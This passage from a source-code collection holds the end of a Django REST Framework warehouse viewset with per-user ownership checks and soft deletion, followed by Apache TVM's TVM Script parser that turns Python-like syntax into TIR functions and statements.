raise APIException({"detail": "You Just Can Add 1 Warehouse"})
else:
serializer = self.get_serializer(data=data)
serializer.is_valid(raise_exception=True)
serializer.save()
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=200, headers=headers)
def update(self, request, pk):
qs = self.get_object()
if qs.openid != self.request.auth.openid:
raise APIException({"detail": "Cannot update data which not yours"})
else:
data = self.request.data
serializer = self.get_serializer(qs, data=data)
serializer.is_valid(raise_exception=True)
serializer.save()
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=200, headers=headers)
def partial_update(self, request, pk):
qs = self.get_object()
if qs.openid != self.request.auth.openid:
raise APIException({"detail": "Cannot partial_update data which not yours"})
else:
data = self.request.data
serializer = self.get_serializer(qs, data=data, partial=True)
serializer.is_valid(raise_exception=True)
serializer.save()
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=200, headers=headers)
def destroy(self, request, pk):
qs = self.get_object()
if qs.openid != self.request.auth.openid:
raise APIException({"detail": "Cannot delete data which not yours"})
else:
qs.is_delete = True
qs.save()
serializer = self.get_serializer(qs, many=False)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=200, headers=headers)
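# Illustrative sketch (not part of the original module): how this viewset would typically
# be exposed through a DRF router; the URL prefix and basename below are hypothetical and
# would normally live in the app's urls.py.
from rest_framework.routers import DefaultRouter
warehouse_router = DefaultRouter()
warehouse_router.register(r'warehouse', APIViewSet, basename='warehouse')
# urlpatterns = warehouse_router.urls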
|
the-stack_106_16957
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""TVM Script Parser For TIR
We use [synr](https://synr.readthedocs.io) to get an AST that is stable over
different python versions. Synr also provides an error handling context that we
use for error reporting.
"""
# pylint: disable=invalid-name, inconsistent-return-statements, no-else-return
import json
import operator
import inspect
from typing import Any, Callable, Dict, List, Optional, Union
from synr import ast, Transformer, to_ast
import tvm
from tvm import IRModule, relax
from tvm._ffi.base import TVMError
from tvm.ir import GlobalVar
from tvm.ir.function import BaseFunc
from tvm.tir import buffer
from tvm.tir.function import PrimFunc
from . import _ffi_api
from . import tir
from .context_maintainer import ContextMaintainer
from .meta_unparser import MetaUnparser
from .registry import Registry
from .diagnostics import TVMDiagnosticCtx
from .utils import tvm_span_from_synr, synr_span_from_tvm, call_with_error_reporting
from .tir.intrin import Intrin
from .tir.node import Slice, BufferSlice
from .tir.scope_handler import ScopeHandler, WithScopeHandler, ForScopeHandler
from .tir.special_stmt import SpecialStmt
from .tir import ty
class CallArgumentReader(object):
"""Helper class to read required arguments from passed arguments.
When parsing a function call, we need to match the arguments provided in
the AST to the required arguments of the function. This class makes sure
all the positional arguments are filled and also fill keyword arguments
    with their default value if a different value was not provided.
"""
def __init__(self, func_name, args, kwargs, parser, node):
self.func_name = func_name
self.args = args
self.kwargs = kwargs
self.parser = parser
self.node = node
def get_pos_only_arg(self, pos, name):
"""Get corresponding position only function argument from argument list"""
if len(self.args) >= pos:
arg = self.args[pos - 1]
elif name not in self.kwargs:
# If no positional argument was found in the AST, we see if it was
# defined by name instead.
# TODO(tkonolige): this error message is not quite correct. The
# number of required arguments is >= pos
self.parser.report_error(
f"{self.func_name} requires {pos} arguments, but only {len(self.args)} were given.",
self.node.span,
)
else:
arg = self.kwargs[name]
return arg
def get_kwarg(self, pos, name, default):
"""Get corresponding keyword function argument from argument list.
If the user hasn't provided the argument, set it to the default value.
"""
if len(self.args) >= pos:
arg = self.args[pos - 1]
elif name in self.kwargs:
arg = self.kwargs[name]
else:
return default
return arg
def get_varargs(self, pos):
"""Get corresponding variable argument from argument list"""
if len(self.args) >= pos and len(self.kwargs) == 0:
return self.args[pos - 1 :]
return []
class TVMScriptParser(Transformer):
"""Synr AST visitor pass which finally lowers to TIR.
Notes for Extension
-------------------
1. To support a new type of AST node, add a function transform_xxx().
2. To support new functions, add the function to the appropriate registry:
We divide allowed function calls in TVM script into 3 categories,
intrin, scope_handler and special_stmt.
1. intrin functions are low level functions like mod, load, and
constants. They correspond to a tir `IRNode`. They must have a
return value. The user can register intrin functions for the parser to
use.
2. scope_handler functions have no return value. They take two
arguments: the parser and the AST node. scope_handler functions are
used in with and for statements.
3. special_stmt functions handle cases that do not have a corresponding
tir `IRNode`. These functions take the parser and the AST node as
arguments and may return a value.
When visiting a Call node, we check the special_stmt registry first. If
no registered function is found, we then check the intrin registry.
When visiting With node, we check the with_scope registry.
When visiting For node, we check the for_scope registry.
"""
_binop_maker = {
ast.BuiltinOp.Add: tvm.tir.Add,
ast.BuiltinOp.Sub: tvm.tir.Sub,
ast.BuiltinOp.Mul: tvm.tir.Mul,
ast.BuiltinOp.Div: tvm.tir.Div,
ast.BuiltinOp.FloorDiv: tvm.tir.FloorDiv,
ast.BuiltinOp.Mod: tvm.tir.FloorMod,
ast.BuiltinOp.BitOr: lambda lhs, rhs, span: operator.or_(lhs, rhs),
ast.BuiltinOp.BitAnd: lambda lhs, rhs, span: operator.and_(lhs, rhs),
ast.BuiltinOp.BitXor: lambda lhs, rhs, span: operator.xor(lhs, rhs),
ast.BuiltinOp.GT: tvm.tir.GT,
ast.BuiltinOp.GE: tvm.tir.GE,
ast.BuiltinOp.LT: tvm.tir.LT,
ast.BuiltinOp.LE: tvm.tir.LE,
ast.BuiltinOp.Eq: tvm.tir.EQ,
ast.BuiltinOp.NotEq: tvm.tir.NE,
ast.BuiltinOp.And: tvm.tir.And,
ast.BuiltinOp.Or: tvm.tir.Or,
}
_unaryop_maker = {
ast.BuiltinOp.USub: lambda rhs, span: operator.neg(rhs),
ast.BuiltinOp.Invert: lambda rhs, span: operator.invert(rhs),
ast.BuiltinOp.Not: tvm.tir.Not,
}
# pylint gets confused here with synr.Transformer which doesn't have a
# custom init, so just disable it
def __init__(self, base_lineno, tir_namespace): # pylint: disable=super-init-not-called
self.context = None
self.base_lineno = base_lineno
self.current_lineno = 0
self.current_col_offset = 0
self.tir_namespace = tir_namespace
self.meta = None
def init_function_parsing_env(self):
"""Initialize function parsing environment"""
self.context = ContextMaintainer(self.report_error) # scope emitter
def init_meta(self, meta_dict):
if meta_dict is not None:
self.meta = tvm.ir.load_json(json.dumps(meta_dict))
def transform(self, node):
"""Generic transformation for visiting the AST. Dispatches to
`transform_ClassName` for the appropriate ClassName."""
old_lineno, old_col_offset = self.current_lineno, self.current_col_offset
if hasattr(node, "lineno"):
self.current_lineno = self.base_lineno + node.lineno - 1
if hasattr(node, "col_offset"):
self.current_col_offset = node.col_offset
method = "transform_" + node.__class__.__name__
visitor = getattr(self, method, self.generic_visit)
transform_res = visitor(node)
self.current_lineno, self.current_col_offset = old_lineno, old_col_offset
return transform_res
def match_tir_namespace(self, identifier: str) -> bool:
"""Check if the namespace is equal to tvm.script.tir"""
return identifier in self.tir_namespace
    def report_error(self, message: str, span: Union[ast.Span, tvm.ir.Span]):
        """Report an error occurring at a location.
This just dispatches to synr's DiagnosticContext.
Parameters
----------
message : str
Error message
        span : Union[synr.ast.Span, tvm.ir.Span]
Location of the error
"""
if isinstance(span, tvm.ir.Span):
span = synr_span_from_tvm(span)
self.error(message, span)
def parse_body(self, parent):
"""Parse remaining statements in this scope.
Parameters
----------
parent : synr.ast.Node
Parent node of this scope. Errors will be reported here.
"""
body = []
spans = []
stmt = parent
while len(self.context.node_stack[-1]) > 0:
stmt = self.context.node_stack[-1].pop()
spans.append(stmt.span)
res = self.transform(stmt)
if res is not None:
body.append(res)
if len(body) == 0:
self.report_error(
"Expected another statement at the end of this block. Perhaps you "
"used a concise statement and forgot to include a body afterwards.",
stmt.span,
)
else:
return (
tvm.tir.SeqStmt(body, tvm_span_from_synr(ast.Span.union(spans)))
if len(body) > 1
else body[0]
)
def parse_arg_list(self, func, node_call):
"""Match the arguments of a function call in the AST to the required
arguments of the function. This handles positional arguments,
positional arguments specified by name, keyword arguments, and varargs.
Parameters
----------
func : Function
The function that provides the signature
node_call: Union[ast.Call, ast.TypeApply, ast.TypeCall]
The AST call node that calls into the function.
Returns
-------
arg_list : list
The parsed positional argument.
"""
assert isinstance(node_call, (ast.Call, ast.TypeApply, ast.TypeCall))
# collect arguments
args = [self.transform(arg) for arg in node_call.params]
if isinstance(node_call, ast.TypeApply):
kw_args = {} # TypeApply (e.g. foo[bar]) doesn't have kwargs defined in synr
else:
kw_args = {
self.transform(k): self.transform(v) for k, v in node_call.keyword_params.items()
}
# get the name and parameter list of func
if isinstance(func, (Intrin, ScopeHandler, SpecialStmt)):
func_name, param_list = func.signature()
else:
self.report_error(
"Internal Error: function must be of type Intrin, ScopeHandler or SpecialStmt, "
f"but it is {type(func).__name__}",
node_call.span,
)
# check arguments and parameter list and get a list of arguments
reader = CallArgumentReader(func_name, args, kw_args, self, node_call)
pos_only, kwargs, varargs = param_list
internal_args = list()
for i, arg_name in enumerate(pos_only):
internal_args.append(reader.get_pos_only_arg(i + 1, arg_name))
for i, arg_info in enumerate(kwargs):
arg_name, default = arg_info
internal_args.append(reader.get_kwarg(i + 1 + len(pos_only), arg_name, default=default))
if varargs is not None:
internal_args.extend(reader.get_varargs(len(pos_only) + len(kwargs) + 1))
elif len(args) + len(kw_args) > len(pos_only) + len(kwargs):
self.report_error(
"Arguments mismatched. "
+ f"Expected {len(pos_only) + len(kwargs)} args but got "
+ f"{len(args) + len(kw_args)}",
node_call.span,
)
return internal_args
def parse_type(self, type_node, parent):
"""Parse a type annotation.
We require the parent object to the type so that we have a place to
report the error message if the type does not exist.
"""
if type_node is None:
self.report_error("A type annotation is required", parent.span)
res_type = self.transform(type_node)
return tvm.ir.TupleType([]) if res_type is None else res_type.evaluate()
def generic_visit(self, node):
"""Fallback visitor if node type is not handled. Reports an error."""
self.report_error(type(node).__name__ + " AST node is not supported", node.span)
def transform_Module(self, node):
"""Module visitor
Right now, we only support two formats for TVM Script.
Example
-------
1. Generate a PrimFunc (If the code is printed, then it may also contain metadata)
.. code-block:: python
import tvm
@tvm.script
def A(...):
...
# returns a PrimFunc
func = A
2. Generate an IRModule
.. code-block:: python
import tvm
@tvm.script.ir_module
class MyMod():
@T.prim_func
def A(...):
...
@T.prim_func
def B(...):
...
__tvm_meta__ = ...
# returns an IRModule
mod = MyMod
"""
if len(node.funcs) == 1:
return self.transform(next(iter(node.funcs.values())))
        elif len(node.funcs) == 0:
self.report_error(
"You must supply at least one class or function definition", node.span
)
else:
self.report_error(
"Only one-function, one-class or function-with-meta source code is allowed",
ast.Span.union([x.span for x in list(node.funcs.values())[1:]]),
)
def transform_Class(self, node):
"""Class definition visitor.
A class can have multiple function definitions and a single
:code:`__tvm_meta__` statement. Each class corresponds to a single
:code:`IRModule`.
Example
-------
.. code-block:: python
@tvm.script.ir_module
class MyClass:
__tvm_meta__ = {}
def A():
T.evaluate(0)
"""
if len(node.assignments) == 1:
if not (
len(node.assignments[0].lhs) == 1
and isinstance(node.assignments[0].lhs[0], ast.Var)
and node.assignments[0].lhs[0].id.name == "__tvm_meta__"
):
self.report_error(
"The only top level assignments allowed are `__tvm_meta__ = ...`",
node.assignments[0].span,
)
self.init_meta(
MetaUnparser().do_transform(node.assignments[0].rhs, self._diagnostic_context)
)
elif len(node.assignments) > 1:
self.report_error(
"Only a single top level `__tvm_meta__` is allowed",
ast.Span.union([x.span for x in node.assignments[1:]]),
)
return IRModule(
{GlobalVar(name): self.transform(func) for name, func in node.funcs.items()}
)
def transform_Function(self, node):
"""Function definition visitor.
Each function definition is translated to a single :code:`PrimFunc`.
There are a couple restrictions on TVM Script functions:
1. Function arguments must have their types specified.
2. The body of the function can contain :code:`func_attr` to specify
attributes of the function (like it's name).
3. The body of the function can also contain multiple :code:`buffer_bind`s,
which give shape and dtype information to arguments.
4. Return statements are implicit.
Example
-------
.. code-block:: python
@T.prim_func
def my_function(x: T.handle): # 1. Argument types
T.func_attr({"global_symbol": "mmult"}) # 2. Function attributes
X_1 = tir.buffer_bind(x, [1024, 1024]) # 3. Buffer binding
T.evaluate(0) # 4. This function returns 0
"""
        def check_decorator(decorators: List[ast.Expr]) -> bool:
            """Check the decorator is `T.prim_func`"""
if len(decorators) != 1:
return False
d: ast.Expr = decorators[0]
return (
isinstance(d, ast.Attr)
and isinstance(d.object, ast.Var)
and self.match_tir_namespace(d.object.id.name)
and d.field.name == "prim_func"
)
self.init_function_parsing_env()
self.context.enter_scope(nodes=node.body.stmts)
# add parameters of function
for arg in node.params:
# Note that this case is for T.match_buffer syntax sugar
if isinstance(arg.ty, (ast.TypeCall, ast.TypeApply)) and isinstance(
self.transform(arg.ty.func_name), ty.GenericBufferType
):
result = self.handle_match_buffer_type(arg.ty, arg.name)
if not isinstance(result, buffer.Buffer):
self.report_error(
"The result type of evaluating TypeCall and TypeApply stmt"
f" is wrong: {type(result)}. It should be a Buffer",
node.span,
)
arg_name_with_handle = arg.name + "_handle"
arg_var = tvm.te.var(arg_name_with_handle, tvm.ir.PrimType("handle"))
self.context.func_buffer_map[arg_var] = result
self.context.update_symbol(arg.name, result, node)
else:
arg_var = tvm.te.var(arg.name, self.parse_type(arg.ty, arg))
self.context.update_symbol(arg.name, arg_var, node)
self.context.func_params.append(arg_var)
if not check_decorator(node.decorators):
self.report_error(
"All functions should be decorated by `T.prim_func`",
node.span,
)
# fetch the body of root block
body = self.parse_body(node.body)
# return a tir.PrimFunc
dict_attr = self.context.func_dict_attr
ret_type = self.parse_type(node.ret_type, node) if node.ret_type is not None else None
func = tvm.tir.PrimFunc(
self.context.func_params,
body,
ret_type,
buffer_map=self.context.func_buffer_map,
attrs=tvm.ir.make_node("DictAttrs", **dict_attr) if dict_attr else None,
span=tvm_span_from_synr(node.span),
)
# New Scope : Implicit root block
# Each function contains an implicit root block in TensorIR,
# so here we need a block scope for it.
# If the PrimFunc is not a TensorIR func (e.g. TE scheduled func or low-level func),
# the root block will not be added. The logic to add root block is in `_ffi_api.Complete`
# Fix the PrimFunc
# 1. generate root block if necessary
# 2. generate surrounding loops for blocks if necessary
func = call_with_error_reporting(
self.report_error,
node.span,
_ffi_api.Complete,
func,
self.context.root_alloc_buffers,
)
self.context.exit_scope()
return func
def transform_Lambda(self, node):
"""Lambda visitor
Return an array of input parameters and the transformed lambda body.
"""
self.context.enter_scope(nodes=[node.body])
# add parameters of the lambda
arg_vars = []
for arg in node.params:
arg_var = tvm.te.var(arg.name)
arg_vars.append(arg_var)
self.context.update_symbol(arg.name, arg_var, node)
# the body of a lambda must be an expr
if not isinstance(node.body, ast.Expr):
self.report_error("The body of a lambda must be an expression", node.span)
# transform the body of the lambda
body = self.transform(node.body)
self.context.exit_scope()
return arg_vars, body
def transform_Assign(self, node):
"""Assign visitor
AST abstract grammar:
Assign(expr* targets, expr value, string? type_comment)
By now 3 patterns of Assign is supported:
1. special stmts with return value
1.1 Buffer = T.match_buffer()/T.buffer_decl()
1.2 Var = T.var()
1.3 Var = T.env_thread()
2. (BufferStore) Buffer[PrimExpr, PrimExpr, ..., PrimExpr] = PrimExpr
3. (Store) Var[PrimExpr] = PrimExpr
4. with scope handlers with concise scoping and var def
4.1 var = T.allocate()
"""
if isinstance(node.rhs, ast.Call):
# Pattern 1 & Pattern 4
func = self.transform(node.rhs.func_name)
if isinstance(func, WithScopeHandler):
if not func.concise_scope or not func.def_symbol:
self.report_error(
"with scope handler " + func.signature()[0] + " is not suitable here",
node.rhs.span,
)
# Pattern 4
arg_list = self.parse_arg_list(func, node.rhs)
func.enter_scope(node, self.context, arg_list, node.rhs.func_name.span)
func.body = self.parse_body(node)
return func.exit_scope(node, self.context, arg_list, node.rhs.func_name.span)
elif isinstance(func, SpecialStmt):
# Pattern 1
arg_list = self.parse_arg_list(func, node.rhs)
func.handle(node, self.context, arg_list, node.rhs.func_name.span)
return self.parse_body(node)
else:
value = self.transform(node.rhs)
if len(node.lhs) == 1 and not isinstance(node.lhs[0], ast.Var):
                    # This is a little confusing because it is only true when
                    # we have taken this branch. We might need to clarify what
                    # exactly is allowed in Assignments in tvmscript.
self.report_error(
"Left hand side of assignment must be an unqualified variable",
node.span,
)
ast_var = node.lhs[0]
var = tvm.te.var(
ast_var.id.name,
self.parse_type(node.ty, ast_var),
span=tvm_span_from_synr(ast_var.span),
)
self.context.update_symbol(var.name, var, node)
body = self.parse_body(node)
self.context.remove_symbol(var.name)
return tvm.tir.LetStmt(var, value, body, span=tvm_span_from_synr(node.span))
self.report_error(
"""Assignments should be either
1. A "special statement" with return value
1.1 Buffer = T.match_buffer()/T.buffer_decl()
1.2 Var = T.var()
1.3 Var = T.env_thread()
2. A store into a buffer: Buffer[PrimExpr, PrimExpr, ..., PrimExpr] = PrimExpr
3. A store into a variable: Var[PrimExpr] = PrimExpr
4. A with scope handler with concise scoping and var def
4.1 var = T.allocate()""",
node.span,
)
def transform_SubscriptAssign(self, node):
"""Visitor for statements of the form :code:`x[1] = 2`."""
symbol = self.transform(node.params[0])
indexes = self.transform(node.params[1])
rhs = self.transform(node.params[2])
rhs_span = tvm_span_from_synr(node.params[2].span)
if isinstance(symbol, tvm.tir.Buffer):
# BufferStore
return tvm.tir.BufferStore(
symbol,
tvm.runtime.convert(rhs, span=rhs_span),
indexes,
span=tvm_span_from_synr(node.span),
)
else:
if symbol.dtype == "handle" and len(indexes) != 1:
self.report_error(
"Handles only support one-dimensional indexing. Use `T.match_buffer` to "
"construct a multidimensional buffer from a handle.",
node.params[0].span,
)
if len(indexes) != 1:
self.report_error(
f"Store is only allowed with one index, but {len(indexes)} were provided.",
node.params[1].span,
)
# Store
return tvm.tir.Store(
symbol,
tvm.runtime.convert(rhs, span=rhs_span),
indexes[0],
tvm.runtime.convert(True, span=tvm_span_from_synr(node.span)),
span=tvm_span_from_synr(node.span),
)
def transform_Assert(self, node):
"""Assert visitor
Pattern corresponds to concise mode of :code:`with T.Assert()`.
"""
condition = self.transform(node.condition)
if node.msg is None:
self.report_error("Assert statements must have an error message.", node.span)
message = self.transform(node.msg)
body = self.parse_body(node)
return tvm.tir.AssertStmt(
condition, tvm.runtime.convert(message), body, span=tvm_span_from_synr(node.span)
)
def transform_For(self, node):
"""For visitor
AST abstract grammar:
For(expr target, expr iter, stmt* body, stmt* orelse, string? type_comment)
By now 1 pattern of For is supported:
1. for scope handler
for name in T.serial()/T.parallel()/T.vectorized()/T.unroll()/range()/
T.grid()/T.thread_binding()
"""
if not isinstance(node.rhs, ast.Call):
self.report_error("The loop iterator should be a function call.", node.rhs.span)
func = self.transform(node.rhs.func_name)
if not isinstance(func, ForScopeHandler):
self.report_error(
"Only For scope handlers can be used in a for statement.", node.rhs.func_name.span
)
# prepare for new for scope
old_lineno, old_col_offset = self.current_lineno, self.current_col_offset
self.current_lineno = node.span.start_line
self.current_col_offset = node.span.start_column
self.context.enter_scope(nodes=node.body.stmts)
# for scope handler process the scope
arg_list = [
tvm.runtime.convert(arg, span=node.rhs.span)
for arg in self.parse_arg_list(func, node.rhs)
]
func.enter_scope(node, self.context, arg_list, node.rhs.func_name.span)
func.body = self.parse_body(node)
res = func.exit_scope(node, self.context, arg_list, node.rhs.func_name.span)
# exit the scope
self.context.exit_scope()
self.current_lineno, self.current_col_offset = old_lineno, old_col_offset
return res
def transform_While(self, node):
"""While visitor
AST abstract grammar:
While(expr condition, stmt* body)
"""
condition = self.transform(node.condition)
# body
self.context.enter_scope(nodes=node.body.stmts)
body = self.parse_body(node)
self.context.exit_scope()
return tvm.tir.While(condition, body, span=tvm_span_from_synr(node.span))
def transform_With(self, node):
"""With visitor
AST abstract grammar:
With(withitem* items, stmt* body, string? type_comment)
withitem = (expr context_expr, expr? optional_vars)
By now 2 patterns of With is supported:
1. with scope handler with symbol def
with T.block(*axes)/T.allocate() as targets:
2. with scope handler without symbol def
with T.let()/T.Assert()/T.attr()/T.realize()
"""
if not isinstance(node.rhs, ast.Call):
self.report_error(
"The context expression of a `with` statement should be a function call.",
node.rhs.span,
)
func = self.transform(node.rhs.func_name)
if not isinstance(func, WithScopeHandler):
self.report_error(
f"Function {func} cannot be used in a `with` statement.", node.rhs.func_name.span
)
# prepare for new block scope
old_lineno, old_col_offset = self.current_lineno, self.current_col_offset
self.current_lineno = node.body.span.start_line
self.current_col_offset = node.body.span.start_column
self.context.enter_block_scope(nodes=node.body.stmts)
# with scope handler process the scope
arg_list = self.parse_arg_list(func, node.rhs)
func.enter_scope(node, self.context, arg_list, node.rhs.func_name.span)
func.body = self.parse_body(node)
res = func.exit_scope(node, self.context, arg_list, node.rhs.func_name.span)
# exit the scope
self.context.exit_block_scope()
self.current_lineno, self.current_col_offset = old_lineno, old_col_offset
return res
def transform_If(self, node):
"""If visitor
AST abstract grammar:
If(expr test, stmt* body, stmt* orelse)
"""
condition = self.transform(node.condition)
# then body
self.context.enter_scope(nodes=node.true.stmts)
then_body = self.parse_body(node)
self.context.exit_scope()
# else body
if len(node.false.stmts) > 0:
self.context.enter_scope(nodes=node.false.stmts)
else_body = self.parse_body(node)
self.context.exit_scope()
else:
else_body = None
return tvm.tir.IfThenElse(
condition, then_body, else_body, span=tvm_span_from_synr(node.span)
)
def transform_Call(self, node):
"""Call visitor
3 different Call patterns are allowed:
1. Intrin representing a PrimExpr/IterVar
1.1 tir.int/uint/float8/16/32/64/floormod/floordiv/load/cast/ramp/broadcast/max
1.2 tir.range/reduce_axis/scan_axis/opaque_axis
2. tir.Op(dtype, ...)
3. other callable functions
"""
if isinstance(node.func_name, ast.Op):
if node.func_name.name == ast.BuiltinOp.Subscript:
return self.transform_Subscript(node)
if node.func_name.name in self._binop_maker:
lhs = self.transform(node.params[0])
# There is no supertype for everything that can appear in
# an expression, so we manually add what we might get here.
if not isinstance(lhs, (tvm.tir.PrimExpr, BufferSlice)):
# We would really like to report a more specific
# error here, but this parser contains no distinction
# between parsing statements and parsing expressions. All
# rules just call `transform`.
                    self.report_error(
                        f"Left hand side of binary op must be a PrimExpr, "
                        f"but it is a {type(lhs).__name__}",
node.params[0].span,
)
rhs = self.transform(node.params[1])
if not isinstance(rhs, (tvm.tir.PrimExpr, BufferSlice)):
                    self.report_error(
                        f"Right hand side of binary op must be a PrimExpr, "
                        f"but it is a {type(rhs).__name__}",
node.params[1].span,
)
return call_with_error_reporting(
self.report_error,
node.span,
lambda node, lhs, rhs, span: self._binop_maker[node.func_name.name](
lhs, rhs, span=span
),
node,
lhs,
rhs,
tvm_span_from_synr(node.span),
)
if node.func_name.name in self._unaryop_maker:
rhs = self.transform(node.params[0])
return self._unaryop_maker[node.func_name.name](
rhs, span=tvm_span_from_synr(node.span)
)
self.report_error(f"Unsupported operator {node.func_name.name}.", node.func_name.span)
else:
func = self.transform(node.func_name)
if isinstance(func, Intrin) and not func.stmt:
# pattern 1
arg_list = self.parse_arg_list(func, node)
return call_with_error_reporting(
self.report_error,
node.func_name.span,
func.handle,
arg_list,
node.func_name.span,
)
else:
args = [self.transform(arg) for arg in node.params]
kw_args = {
self.transform(k): self.transform(v) for k, v in node.keyword_params.items()
}
if isinstance(func, tvm.tir.op.Op):
                    if "dtype" not in kw_args:
self.report_error(f"{func} requires a dtype keyword argument.", node.span)
# pattern 2
return tvm.tir.Call(
kw_args["dtype"], func, args, span=tvm_span_from_synr(node.span)
)
elif callable(func):
# pattern 3
return func(*args, **kw_args)
else:
self.report_error(
f"Function is neither callable nor a tvm.tir.op.Op (it is a {type(func)}).",
node.func_name.span,
)
def transform_UnassignedCall(self, node):
"""Visitor for statements that are function calls.
        This handles function calls that appear on their own line like `tir.realize`.
Examples
--------
.. code-block:: python
@T.prim_func
def f():
A = T.buffer_decl([10, 10])
T.realize(A[1:2, 1:2], "") # This is an UnassignedCall
A[1, 1] = 2 # This is also an UnassignedCall
"""
# Only allowed builtin operator that can be a statement is x[1] = 3 i.e. subscript assign.
if isinstance(node.call.func_name, ast.Op):
if node.call.func_name.name != ast.BuiltinOp.SubscriptAssign:
self.report_error(
"Binary and unary operators are not allowed as a statement", node.span
)
else:
return self.transform_SubscriptAssign(node.call)
# handle a regular function call
func = self.transform(node.call.func_name)
arg_list = self.parse_arg_list(func, node.call)
if isinstance(func, tir.scope_handler.AssertHandler):
self.report_error(
"A standalone `T.Assert` is not allowed. Use `assert condition, message` "
"instead.",
node.call.func_name.span,
)
if isinstance(func, Intrin):
if func.stmt:
return call_with_error_reporting(
self.report_error,
node.call.func_name.span,
func.handle,
arg_list,
node.call.func_name.span,
)
else:
self.report_error(f"This intrinsic cannot be used as a statement.", node.call.span)
elif isinstance(func, WithScopeHandler) and func.concise_scope and not func.def_symbol:
func.enter_scope(node, self.context, arg_list, node.call.func_name.span)
func.body = self.parse_body(node)
return func.exit_scope(node, self.context, arg_list, node.call.func_name.span)
elif isinstance(func, SpecialStmt) and not func.def_symbol:
func.handle(node, self.context, arg_list, node.call.func_name.span)
return
self.report_error(
"Unexpected statement. Expected an assert, an intrinsic, a with statement, or a "
f"special statement, but got {type(func).__name__}.",
node.call.func_name.span,
)
def transform_Slice(self, node):
start = self.transform(node.start)
end = self.transform(node.end)
if not (isinstance(node.step, ast.Constant) and node.step.value == 1):
self.report_error("Only step size 1 is supported for slices.", node.step.span)
return Slice(start, end)
def transform_Subscript(self, node):
"""Array access visitor.
By now only 3 types of Subscript are supported:
1. Buffer[index, index, ...], Buffer element access(BufferLoad & BufferStore)
Var[index] Buffer element access()
2. Buffer[start: stop, start: stop, ...], BufferRealize(realize(buffer[...]))
3. Array[index], Buffer element access
"""
symbol = self.transform(node.params[0])
if symbol is None:
self.report_error(
f"Variable {node.params[0].id.name} is not defined.", node.params[0].span
)
indexes = [self.transform(x) for x in node.params[1].values]
if isinstance(symbol, tvm.tir.expr.Var):
if symbol.dtype == "handle":
self.report_error(
"Cannot read directly from a handle, use `T.match_buffer` "
"to create a buffer to read from.",
node.params[0].span,
)
if len(indexes) > 1:
self.report_error(
"Only a single index can be provided when indexing into a `var`.",
node.params[1].span,
)
index = indexes[0]
if not isinstance(index, (tvm.tir.PrimExpr, int)):
                self.report_error(
                    "Var load index should be an int or PrimExpr, but it is a " + str(type(index)),
node.span,
)
return call_with_error_reporting(
self.report_error,
node.span,
tvm.tir.Load,
"float32",
symbol,
index,
True,
span=tvm_span_from_synr(node.span),
)
elif isinstance(symbol, tvm.tir.Buffer):
return BufferSlice(
symbol, indexes, self.report_error, span=tvm_span_from_synr(node.span)
)
elif isinstance(symbol, tvm.container.Array):
if len(indexes) > 1:
self.report_error(
"Array access should be one-dimension access, but the indices are "
+ str(indexes),
node.span,
)
index = indexes[0]
if not isinstance(index, (int, tvm.tir.expr.IntImm)):
                self.report_error(
                    "Array access index expected int or IntImm, but got " + str(type(index)),
node.span,
)
if int(index) >= len(symbol):
self.report_error(
f"Array access out of bound, size: {len(symbol)}, got index {index}.",
node.span,
)
return symbol[int(index)]
else:
self.report_error(
f"Cannot subscript from a {type(symbol).__name__}. Only variables and "
"buffers are supported.",
node.params[0].span,
)
def transform_Attr(self, node):
"""Visitor for field access of the form `x.y`.
This visitor is used to lookup function and symbol names. We have two
cases to handle here:
1. If we have a statement of the form `tir.something`, then we lookup
`tir.something` in the `Registry`. If the function is not in the
registry, then we try to find a `tvm.ir.op.Op` with the same name.
2. All other names `tvm.something` are lookup up in this current python
namespace.
"""
def get_full_attr_name(node: ast.Attr) -> str:
reverse_field_names = [node.field.name]
while isinstance(node.object, ast.Attr):
node = node.object
reverse_field_names.append(node.field.name)
if isinstance(node.object, ast.Var):
reverse_field_names.append(node.object.id.name)
return ".".join(reversed(reverse_field_names))
if isinstance(node.object, (ast.Var, ast.Attr)):
full_attr_name = get_full_attr_name(node)
attr_object, fields = full_attr_name.split(".", maxsplit=1)
if self.match_tir_namespace(attr_object):
func_name = "tir." + fields
res = Registry.lookup(func_name)
if res is not None:
return res
try:
return tvm.ir.op.Op.get(func_name)
except TVMError as e:
# Check if we got an attribute error
                    if e.args[0].find("AttributeError") != -1:
self.report_error(f"Unregistered function `tir.{fields}`.", node.span)
else:
raise e
symbol = self.transform(node.object)
if symbol is None:
self.report_error("Unsupported Attribute expression.", node.object.span)
if not hasattr(symbol, node.field.name):
self.report_error(
f"Type {type(symbol)} does not have a field called `{node.field.name}`.", node.span
)
res = getattr(symbol, node.field.name)
return res
def transform_TypeAttr(self, node):
"""Visitor for field access of the form `x.y` for types.
We have two cases here:
1. If the type is of the form `T.something`, we look up the type in
the `tir` namespace in this module.
2. If the type is of the form `tvm.x.something` then we look up
`tvm.x.something` in this modules namespace.
"""
if isinstance(node.object, ast.TypeVar):
if self.match_tir_namespace(node.object.id.name):
if not hasattr(tir, node.field.name):
self.report_error(
f"Invalid type annotation `tir.{node.field.name}`.", node.span
)
return getattr(tir, node.field.name)
symbol = self.transform(node.object)
if symbol is None:
self.report_error("Unsupported Attribute expression", node.object.span)
if not hasattr(symbol, node.field):
self.report_error(
f"Type {type(symbol)} does not have a field called `{node.field}`.", node.span
)
res = getattr(symbol, node.field)
return res
def transform_DictLiteral(self, node):
"""Dictionary literal visitor.
Handles dictionary literals of the form `{x:y, z:2}`.
"""
keys = [self.transform(key) for key in node.keys]
values = [self.transform(value) for value in node.values]
return dict(zip(keys, values))
def transform_Tuple(self, node):
"""Tuple visitor.
Handles tuples of the form `(x, y, 2)`.
"""
return tuple(self.transform(element) for element in node.values)
def transform_ArrayLiteral(self, node):
"""List literal visitor.
Handles lists of the form `[x, 2, 3]`.
"""
